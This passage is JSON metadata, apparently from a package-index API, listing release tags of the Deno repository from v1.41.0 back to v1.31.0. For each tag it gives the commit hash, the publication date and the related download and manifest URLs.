_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno